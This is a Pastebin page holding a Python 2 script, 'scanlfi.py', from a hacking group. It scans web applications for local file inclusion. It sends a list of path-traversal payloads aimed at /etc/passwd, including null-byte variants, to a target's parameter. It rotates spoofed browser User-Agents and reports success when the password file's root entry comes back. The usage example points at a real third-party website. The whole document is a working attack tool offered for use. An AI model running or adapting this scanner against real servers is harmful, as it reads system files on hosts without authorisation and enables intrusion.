Advertisement
parkdream1

scanlfi.py

Apr 23rd, 2012
322
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 3.66 KB | None | 0 0
  1. #!/usr/bin/python
  2. # Author: parkdream1
  3. # Messenger: h3x4r
  4. # (c) R00TW0RM - Private Community
  5. # https://r00tw0rm.com/
  6. # Local File Include Scaner
  7. # Greets: To all members of r00tw0rm !!
  8.  
  9. import socket,sys,re,random,time
  10. from random import choice
  11.  
  12. passwd = ["/etc/passwd",
  13.     "../etc/passwd",
  14.     "../../etc/passwd",
  15.     "../../../etc/passwd",
  16.     "../../../../etc/passwd",
  17.     "../../../../../etc/passwd",
  18.     "../../../../../../etc/passwd",
  19.     "../../../../../../../etc/passwd",
  20.     "../../../../../../../../etc/passwd",
  21.     "../../../../../../../../../etc/passwd",
  22.     "../../../../../../../../../../etc/passwd",
  23.     "../../../../../../../../../../../etc/passwd",
  24.     "../../../../../../../../../../../../etc/passwd",
  25.     "../../../../../../../../../../../../../etc/passwd",
  26.     "/etc/passwd%00",
  27.     "../etc/passwd%00",
  28.     "../../etc/passwd%00",
  29.     "../../../etc/passwd%00",
  30.     "../../../../etc/passwd%00",
  31.     "../../../../../etc/passwd%00",
  32.     "../../../../../../etc/passwd%00",
  33.     "../../../../../../../etc/passwd%00",
  34.     "../../../../../../../../etc/passwd%00",
  35.     "../../../../../../../../../etc/passwd%00",
  36.     "../../../../../../../../../../etc/passwd%00",
  37.     "../../../../../../../../../../../etc/passwd%00",
  38.     "../../../../../../../../../../../../etc/passwd%00",
  39.     "../../../../../../../../../../../../../etc/passwd%00"]
  40.  
  41. user = ['Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))',
  42.     'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)',
  43.     'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)',
  44.     'Mozilla/5.0 (X11; U; Linux i586; de; rv:5.0) Gecko/20100101 Firefox/5.0',
  45.     'Mozilla/5.0 (X11; U; Linux amd64; rv:5.0) Gecko/20100101 Firefox/5.0 (Debian)',
  46.     'Mozilla/5.0 (X11; U; Linux amd64; en-US; rv:5.0) Gecko/20110619 Firefox/5.0',
  47.     'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; chromeframe/12.0.742.112)',
  48.     'Opera/9.80 (X11; Linux i686; U; ru) Presto/2.8.131 Version/11.11',
  49.     'Opera/9.80 (X11; Linux i686; U; es-ES) Presto/2.8.131 Version/11.11',
  50.     'Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.1) Gecko/20061208 Firefox/5.0 Opera 11.11']
  51.  
  52. agent = random.choice(user)
  53.  
  54. def scan():
  55.     for lfi in passwd:
  56.         try:  
  57.             r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  58.             r.connect((target, port))
  59.             r.send("GET /"+path+lfi+" HTTP/1.0\r\n")
  60.             r.send("Host: "+target+"\r\n")
  61.             r.send("User-Agent: "+agent+"\r\n\r\n")
  62.             print "[*] Send Request Success"
  63.             print "http://"+target+"/"+path+lfi
  64.             page = r.recv(1024)
  65.             fullpage = ""
  66.             while len(page):
  67.                 fullpage = fullpage + page
  68.                 page = r.recv(1024)
  69.             r.close()
  70.         except Exception, e:
  71.             print "[-] Cant Not Send Request"
  72.             print e
  73.             sys.exit(1)
  74.         r00t = re.search("root:x:0:0:",fullpage)
  75.         if r00t:
  76.             print "\033[32m[*] Request Vulnerability\n"
  77.             sys.exit(1)
  78.         else:
  79.             print "[-] Request Is Not Vulnerability\n"
  80.         time.sleep(1)
  81.  
  82. def banner():
  83.     print "\n"
  84.     print "****************************************************************************"
  85.     print "||                               Local File Include Scaner                ||"
  86.     print "||                                    by parkdream1                       ||"
  87.     print "||                               (c) R00TW0RM - Private Community         ||"
  88.     print "                             Fucking from "+target+" on port "+str(port)
  89.     print "****************************************************************************"
  90.     print "\n"
  91.  
  92. if __name__ == '__main__':
  93.     if len(sys.argv) != 4:
  94.         print >>sys.stderr, "Usage:", sys.argv[0], "<Target IP> <Port> <Path>"
  95.         print "Example: python", sys.argv[0], "playerstage.sourceforge.net 80 index.php?src="
  96.         sys.exit(1)
  97.  
  98.     target, port, path = sys.argv[1], int(sys.argv[2]), sys.argv[3]
  99.  
  100.     banner()
  101.     scan()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement